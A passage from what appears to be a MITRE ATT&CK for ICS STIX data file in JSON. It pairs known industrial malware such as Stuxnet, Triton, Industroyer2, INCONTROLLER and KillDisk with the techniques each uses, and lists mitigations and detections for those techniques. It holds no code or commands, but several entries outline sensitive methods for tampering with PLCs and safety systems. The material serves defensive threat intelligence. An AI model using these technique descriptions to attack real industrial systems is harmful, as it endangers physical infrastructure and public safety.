This may be even more useful in cases where the source of the executed script is unknown.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7c893581-c847-495a-aa93-9d98c516e1ae", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:13:43.688Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603)'s infection sequence consists of code blocks and data blocks that will be downloaded to the PLC to alter its behavior. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--40479f3e-d4d2-45f8-893f-f8a4fcf1613c", + "created": "2022-09-28T21:16:28.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.435Z", + "description": "The [INCONTROLLER](https://attack.mitre.org/software/S1045) PLCProxy module can add an IP route to the CODESYS gateway running on Schneider PLCs to allow it to route messages through the PLC to other devices on that network. 
This allows the malware to bypass firewall rules that prevent it from directly communicating with devices on the same network as the PLC.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2087b2b9-3b30-45be-abcd-4320bf0fa66b", + "created": "2023-03-30T19:26:19.782Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. 
Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:09:28.674Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) can iterate across a device’s IOAs to modify the ON/OFF value of a given IO state.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b8d6e550-18fe-49ad-9964-7802bbe0cb58", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:11.538Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a7fbe555-a61b-4b93-bfb2-8e0dd0d6323e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Consider utilizing jump boxes for external remote access. 
Additionally, dynamic account management may be used to easily remove accounts when not in use.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cca191a1-3c50-4d4f-8f79-4247e58af610", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.146Z", + "relationship_type": "mitigates", + "description": "Use tools that restrict program execution via application control by attributes other than file name for common system and application utilities.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9d9cd365-8cfe-403f-8ecb-3c23650c13c3", + "created": "2022-09-26T14:44:05.557Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:44.728Z", + "description": "Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": 
"attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7c2edd6c-5189-4ba9-af3d-bdaff4a699ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.080Z", + "relationship_type": "mitigates", + "description": "Consider removing or restricting features that are unnecessary to an asset's intended function within the control environment.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--81ca994a-b350-424d-8f39-a0b64aa76260", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Users can be trained to identify social engineering techniques and spearphishing emails.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea50253a-3220-458b-b810-ad032f2b182f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "ICS-CERT December 2018", + "description": "ICS-CERT 2018, December 18 Advisory (ICSA-18-107-02) - Schneider Electric Triconex Tricon (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02" + }, + { + "source_name": "Schneider Electric January 2018", + "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ", + "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s" + }, + { + "source_name": "The Office of Nuclear Reactor Regulation", + "description": "The Office of Nuclear Reactor Regulation Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 Triconex Topical Report 7286-545-1 Retrieved. 2018/05/30 ", + "url": "https://www.nrc.gov/docs/ML1209/ML120900890.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:54.342Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) disables a firmware RAM/ROM consistency check after injects a payload (imain.bin) into the firmware memory region. (Citation: DHS CISA February 2019) (Citation: ICS-CERT December 2018) (Citation: Schneider Electric January 2018) Triconex systems include continuous means of detection including checksums for firmware and program integrity, memory and memory reference integrity, and configuration. 
(Citation: The Office of Nuclear Reactor Regulation)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1f87378c-49fb-4da5-8ed3-3672633d3713", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Regularly scan the internal network for available services to identify new and potentially vulnerable services.\n", + "source_ref": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--808174b7-3ab0-45b5-963e-5c10dd749e3c", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:43:45.457Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + 
"x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--baf4bd30-4213-43c3-b70c-54418e734caf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with program upload activity to prevent unauthorized access to device configurations.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a946c9b1-5b89-44c9-b617-3412ffda34b9", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:55.358Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) calls the SafeAppendProgramMod to transfer its payloads to the Tricon. Part of this call includes preforming a program upload. 
(Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34ac1b1b-1103-4fc9-a62e-f1dd1451b28b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 
2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3bff265f-7ab9-4dae-b7a3-a5d9bc586f35", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:59.240Z", + "description": "Monitor for known proxy protocols (e.g., SOCKS, Tor, peer-to-peer protocols) and tool usage (e.g., Squid, peer-to-peer software) on the network that are not part of normal operations. Also monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff3f0668-98df-44c1-88c2-711f05720eb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.060Z", + "relationship_type": "mitigates", + "description": "Restrict configurations changes and firmware updating abilities to only authorized individuals.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + 
"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--86c94552-de59-453d-ac06-28a6a64db930", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:47:46.836Z", + "description": "Monitor device application logs which may contain information related to operating mode changes, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e5b62475-bd08-4ac6-a6f7-78f1843bf506", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:52:04.484Z", + "description": "Monitor executed commands and arguments for actions that aid in sniffing network traffic to capture information about an environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 
"relationship--17fdec71-98e8-4314-a1be-037edede58bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:48.171Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f9c29dd4-1c5e-4f7e-b60a-862319a6d0a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.184Z", + "relationship_type": "mitigates", + "description": "Allow for code signing of any project files stored at rest to prevent unauthorized tampering. 
Ensure the signing keys are not easily accessible on the same system.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--31203165-79d0-42e5-81f1-62150dea2c43", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:16:37.643Z", + "description": "Monitor network data for uncommon data flows (e.g., time of day, unusual source/destination address) that may be related to abuse of [Valid Accounts](https://attack.mitre.org/techniques/T0859) to log into a service specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d9165ecb-bc10-4189-a7e4-057bdf05bf3f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 
2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:35:32.480Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) targeted energy sector organizations in a wide reaching email spearphishing campaign. Adversaries utilized malicious Microsoft Word documents attachments. (Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd856176-396c-4121-9754-35e49bfa5758", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:41:55.062Z", + "description": "Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5914a482-dbb7-429d-96f3-77f0588ac12d", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.123Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ab8e129c-5411-4784-9194-068fa915da23", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov", + "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 2019/10/29 ", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:49.878Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) deletes application, security, setup, and system event logs from Windows systems. 
(Citation: Anton Cherepanov)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--50a2b289-7bce-405d-8515-c2b5424cce5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.090Z", + "relationship_type": "mitigates", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 